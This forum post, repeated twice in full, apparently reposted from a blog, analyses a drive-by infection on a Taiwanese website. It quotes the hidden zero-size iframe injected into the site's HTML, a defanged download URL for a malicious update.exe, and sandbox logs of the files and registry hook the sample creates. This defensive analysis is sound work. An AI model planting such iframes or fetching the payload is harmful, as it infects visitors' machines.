Roger
2007-07-13, 11:19 AM
轉自大砲開講
http://rogerspeaking.blogspot.com/2007/07/blog-post_3071.html
被植入惡意連結的網站
hxxp://www.fisherman.com.tw/
網頁code:
</tr>
</table>
</div>
</body>
</html>
<iframe src=hxxp://www.misofthelp.com/help/help.htm width=0 height=0 frameborder=0></iframe>
但是,他用到US-ASCII,我不會解
所以,我只抓到下面這隻
hxxp://www.misofthelp.com/help/update.exe
運行update.exe,發現下列行為,被EQ-Secure RC4攔截!
2007-07-13 11:03:08 创建文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\system32\winCreate.exe
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*
2007-07-13 11:03:08 创建文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*
2007-07-13 11:03:08 创建注册表值 操作:阻止
进程路径:D:\桌面\virus\update\update.exe
注册表路径:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注册表名称:{6F4747B0-4094-4200-A251-866989504B17}
触发规则:所有程序规则->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*
2007-07-13 11:03:08 加载库文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
触发规则:黑名单->2.1组:禁止从Temp文件夹运行程序->C:\Documents and Settings\*\Application Data\Sandbox\*
1.他會在C\windows\system32\生成
winCreate.exe
2.他會在C\Program Files\Common Files\生成
search.dll
3.他會创建注册表值
HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{6F4747B0-4094-4200-A251-866989504B17}
4.他會加载库文件
C\Program Files\Common Files\search.dll
有用HIPS測試的人,可以看update.exe是否會"安裝全局鉤子"?
有人可以教我,US-ASCII要如何解碼嗎?
贊助商連結
http://rogerspeaking.blogspot.com/2007/07/blog-post_3071.html
被植入惡意連結的網站
hxxp://www.fisherman.com.tw/
網頁code:
</tr>
</table>
</div>
</body>
</html>
<iframe src=hxxp://www.misofthelp.com/help/help.htm width=0 height=0 frameborder=0></iframe>
但是,他用到US-ASCII,我不會解
所以,我只抓到下面這隻
hxxp://www.misofthelp.com/help/update.exe
運行update.exe,發現下列行為,被EQ-Secure RC4攔截!
2007-07-13 11:03:08 创建文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\system32\winCreate.exe
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*
2007-07-13 11:03:08 创建文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*
2007-07-13 11:03:08 创建注册表值 操作:阻止
进程路径:D:\桌面\virus\update\update.exe
注册表路径:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注册表名称:{6F4747B0-4094-4200-A251-866989504B17}
触发规则:所有程序规则->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*
2007-07-13 11:03:08 加载库文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
触发规则:黑名单->2.1组:禁止从Temp文件夹运行程序->C:\Documents and Settings\*\Application Data\Sandbox\*
1.他會在C\windows\system32\生成
winCreate.exe
2.他會在C\Program Files\Common Files\生成
search.dll
3.他會创建注册表值
HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{6F4747B0-4094-4200-A251-866989504B17}
4.他會加载库文件
C\Program Files\Common Files\search.dll
有用HIPS測試的人,可以看update.exe是否會"安裝全局鉤子"?
有人可以教我,US-ASCII要如何解碼嗎?
贊助商連結